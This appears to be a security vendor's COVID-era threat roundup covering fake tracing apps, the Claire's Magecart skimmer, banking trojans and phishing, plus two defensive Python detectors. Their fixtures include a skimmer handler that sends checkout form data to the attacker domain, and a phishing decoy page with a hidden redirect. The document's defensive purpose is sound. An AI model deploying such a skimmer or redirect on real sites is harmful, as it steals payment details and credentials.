The COVID-19 Weekly Threat Roundup series is part of how we’re helping our customers and the broader cybersecurity community during this challenging period.
This news is designed to help you and your team continue to defend your organizations from evolving cybersecurity threats during the COVID-19 pandemic.
Each item includes a new cyberattack, with attack vectors, IOCs, and security recommendations (as applicable), combining credible open-source threat intelligence with insights from the Arctic Wolf team.
You can also read previous roundups on our COVID-19 blog feed, highlighted with the orange threat roundup banner.
1. Malicious Phone Apps Exploit COVID-19
Fake COVID-19 Tracing Apps Download Malware
Attack Summary: Multiple countries have released smartphone applications that trace COVID-19 exposures and provide health information to citizens. In these campaigns, attackers publish apps that impersonate the legitimate tracing apps; the fakes contain or download commodity Android malware, including banking trojans and spyware.
- Train employees about the risk of malicious applications impersonating official COVID apps
- Establish security policies about work use of personal devices to reduce data exposure
- Use detection and response solutions to identify systems compromised by malicious applications
2. Attacks on Remote Commerce
Attackers Targeted Claire’s E-Commerce When Stores Closed
Attack Summary: Magecart is the umbrella name for several groups that plant payment-card skimmers on e-commerce sites. In this attack, they targeted Claire’s, a fashion retailer. On March 20, Claire’s closed its roughly three thousand store locations worldwide in response to the coronavirus pandemic. The next day, an anonymous party registered the domain “claires-assets[.]com”. Attackers then injected skimming code into the online store, so that the payment details entered at checkout were copied to that domain with each order. When informed by security researchers, Claire’s removed the malicious code.
- Businesses that use e-commerce platforms should evaluate their security posture in light of a likely increase in attacks against e-commerce
- It is not clear how Magecart compromised Claire’s e-commerce platform; attack vectors may include leaked credentials, spearphishing, or network compromise
- Use detection and response and account takeover solutions to protect against potential vectors of compromise
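A skimmer like the one described above betrays itself by the host it sends data to. The following is an added example, not code from the roundup or from Claire’s: it scans a checkout page’s JavaScript for absolute URLs, flags any host that is not on the store’s expected list, and calls out brand lookalikes (a host such as claires-assets.com that contains the brand name without being a brand domain). The allowlist, the payment-processor host checkout.example-psp.com and the skimmer snippet are constructed for the example; only the attacker domain comes from the roundup. It also builds the Content-Security-Policy connect-src/img-src directives that would have blocked the beacon.

```python
"""Audit a storefront's checkout JavaScript for unexpected exfiltration hosts.

Added example (not Arctic Wolf's or Claire's code). The allowlist, the payment
processor host and the skimmer snippet are constructed for illustration; the
attacker domain is the one the roundup names.
"""
import re
from urllib.parse import urlparse

# Hosts the storefront is expected to contact at checkout (assumed for the example).
ALLOWED_HOSTS = {"www.claires.com", "claires.com", "checkout.example-psp.com"}
# Brand strings whose appearance in a foreign host suggests a lookalike domain.
BRAND_TOKENS = ("claires",)

URL_RE = re.compile(r"""https?://[^\s'"<>)]+""")


def extract_hosts(script: str) -> set[str]:
    """Return every hostname referenced by an absolute URL in the script text."""
    hosts = set()
    for match in URL_RE.finditer(script):
        host = urlparse(match.group(0)).hostname
        if host:
            hosts.add(host.lower())
    return hosts


def is_brand_lookalike(host: str, tokens=BRAND_TOKENS) -> bool:
    """True if the brand name appears in a host once dots and hyphens are
    ignored (catches claires-assets.com, claires.assets.example, ...)."""
    squashed = host.replace("-", "").replace(".", "")
    return any(token in squashed for token in tokens)


def audit_checkout_scripts(script: str, allowed=ALLOWED_HOSTS) -> list[tuple[str, str]]:
    """List (host, reason) for every referenced host that is not expected.

    A brand lookalike is the stronger signal: a skimmer's collection domain is
    often chosen to blend in with the victim's own assets.
    """
    findings = []
    for host in sorted(extract_hosts(script)):
        if host in allowed:
            continue
        reason = "brand lookalike" if is_brand_lookalike(host) else "not on allowlist"
        findings.append((host, reason))
    return findings


def recommended_csp(allowed=ALLOWED_HOSTS) -> str:
    """Build connect-src/img-src directives limited to the expected hosts.

    Skimmers typically exfiltrate with fetch()/XHR (connect-src) or by setting
    an Image src (img-src); 'self' covers the store's own origin.
    """
    sources = " ".join("https://" + h for h in sorted(allowed))
    return f"connect-src 'self' {sources}; img-src 'self' data: {sources}"


# Constructed checkout script: two legitimate calls plus a skimmer-style handler
# that copies the submitted payment form to the attacker domain from the roundup.
CONSTRUCTED_CHECKOUT_JS = r"""
fetch("https://www.claires.com/api/cart", {method: "POST", body: cart});
loadScript("https://checkout.example-psp.com/v1/pay.js");
document.querySelector("#checkout").addEventListener("submit", function () {
  var form = new FormData(this);
  var payload = btoa(JSON.stringify(Array.from(form.entries())));
  new Image().src = "https://claires-assets.com/collect?d=" + payload;
});
"""

if __name__ == "__main__":
    for host, reason in audit_checkout_scripts(CONSTRUCTED_CHECKOUT_JS):
        print(f"{host}: {reason}")
    print("Content-Security-Policy:", recommended_csp())
```

Run this against the script bundles actually served on the checkout page, not the copy in source control, since skimmers are injected into deployed files or delivered through a third-party tag. Deploying the generated policy as Content-Security-Policy-Report-Only first will surface any legitimate hosts missing from the allowlist before anything is blocked.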
FBI Warns of Attacks on Mobile Banking Apps
Attack Summary: The FBI has issued a warning about increasing attacks against mobile banking. The warning notes that mobile banking has surged 50% since the beginning of 2020, and highlights app-based banking trojans and fake banking apps as major mobile banking threats.
- Warn employees about the risk of mobile banking attacks
- Require multi-factor authentication for banking and other sensitive accounts
- Use detection and response solutions to identify malicious applications on business endpoints, including employee devices used for work activities
3. COVID Phishing Update
New Hacker Organization, “Vendetta”, Impersonates Taiwanese CDC
Attack Summary: “Vendetta”, a threat group first observed in May 2020, focuses on COVID-19 themed phishing campaigns. In this campaign, Vendetta impersonated the Taiwanese CDC and falsely informed targets that a close contact had contracted COVID-19. The phishing email urged targets to download an attachment containing information for booking a test. The malicious attachment unpacks through several layers of obfuscation before installing the NanoCore remote access trojan (RAT), which gives the attacker remote control of the infected host.
Further hashes related to Vendetta are available at the source link below
- Ensure employees are aware of the risk of phishing campaigns impersonating health authorities
- Update mail and endpoint security with the latest IOCs to block attacks
- Employ detection and response solutions to identify systems compromised by malware, or connections back to C2 servers, in order to promptly respond to attacks
Phishing Attack Spoofs Reimbursement Policy, “COVID-19 Relief Plan”
Attack Summary: In this broad campaign, attackers distributed malicious HTM (HTML) attachments in emails purporting to come from the targets’ Human Resources departments. The message asks the recipient to sign in to review a policy; opening the attachment redirects the browser to a phishing page imitating the Office 365 sign-in, which harvests the entered credentials.
- Implement mail security controls (for example, tagging messages from external senders) that help employees recognize outsiders impersonating internal departments
- Detection and response solutions can identify when credentials are shared with malicious sites
- Account takeover risk solutions can identify compromised credentials, enabling businesses to mitigate risk
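An HTM attachment of the kind described above is a small decoy page whose only job is to move the browser to the credential-harvesting site, via a meta refresh, a script that sets window.location, or a form posting elsewhere, sometimes with the destination hidden behind base64. The example below is added here and is not Arctic Wolf’s code: it pulls every destination out of such a file, decodes atob() arguments, and reports hosts that are neither the company’s own (example-corp.com, an assumed placeholder) nor the genuine Office 365 sign-in host login.microsoftonline.com. The attachment sample is constructed, and the phishing hostnames in it are invented placeholders.

```python
"""Triage an HTM mail attachment: where does it send the browser?

Added example, not Arctic Wolf's code. The corporate domain and the sample
attachment below are constructed; the phishing hosts are placeholders.
"""
import base64
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Destinations that are legitimate for this organisation (assumed): its own domain
# and the real Office 365 sign-in host.
CORPORATE_DOMAINS = {"example-corp.com", "login.microsoftonline.com"}

URL_RE = re.compile(r"""https?://[^\s'"<>;)]+""")
ATOB_RE = re.compile(r"""atob\(\s*["']([A-Za-z0-9+/=]+)["']\s*\)""")


class _DestinationParser(HTMLParser):
    """Collect redirect and submission targets expressed as HTML markup."""

    def __init__(self):
        super().__init__()
        self.urls = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # attribute names arrive lowercased
        if tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            m = re.search(r"url\s*=\s*['\"]?([^'\";]+)", a.get("content", ""), re.I)
            if m:
                self.urls.append(m.group(1).strip())
        elif tag == "form" and a.get("action"):
            self.urls.append(a["action"])
        elif tag in ("script", "iframe") and a.get("src"):
            self.urls.append(a["src"])


def extract_destinations(html: str) -> list[str]:
    """Every URL the page can send the browser to, including ones hidden in
    base64 passed to atob() (a common way to keep the real host out of sight)."""
    parser = _DestinationParser()
    parser.feed(html)
    found = list(parser.urls)
    found += URL_RE.findall(html)  # covers location.href = "https://..." in scripts
    for b64 in ATOB_RE.findall(html):
        try:
            decoded = base64.b64decode(b64).decode("utf-8", "replace")
        except ValueError:
            continue
        found += URL_RE.findall(decoded)
    return found


def _host_allowed(host: str, allowed) -> bool:
    return any(host == d or host.endswith("." + d) for d in allowed)


def suspicious_destinations(html: str, allowed=CORPORATE_DOMAINS) -> list[str]:
    """Sorted list of destination hosts that are not corporate or Microsoft."""
    hosts = set()
    for url in extract_destinations(html):
        host = urlparse(url).hostname
        if host and not _host_allowed(host.lower(), allowed):
            hosts.add(host.lower())
    return sorted(hosts)


# Constructed decoy attachment: a visible meta refresh plus a base64-hidden
# script redirect. Both hostnames are invented placeholders.
CONSTRUCTED_HTM = """<!DOCTYPE html>
<html><head><title>HR Policy Update - COVID-19 Relief Plan</title>
<meta http-equiv="refresh" content="3; url=https://hr-relief-plan-review.example.net/office365/login">
</head><body>
<p>Please sign in with your work account to review the updated reimbursement policy.</p>
<script>
  setTimeout(function () {
    window.location.href = atob("aHR0cHM6Ly9vMzY1LWhyLXBvbGljeS5leGFtcGxlLm9yZy9zaWduaW4=");
  }, 1000);
</script>
</body></html>"""

if __name__ == "__main__":
    for host in suspicious_destinations(CONSTRUCTED_HTM):
        print("redirects to non-corporate host:", host)
```

Any non-empty result from suspicious_destinations is reason to block the attachment and feed the hosts into mail and web filtering; a legitimate HR notice has no need to bounce the reader through a third-party domain to reach the Office 365 sign-in page.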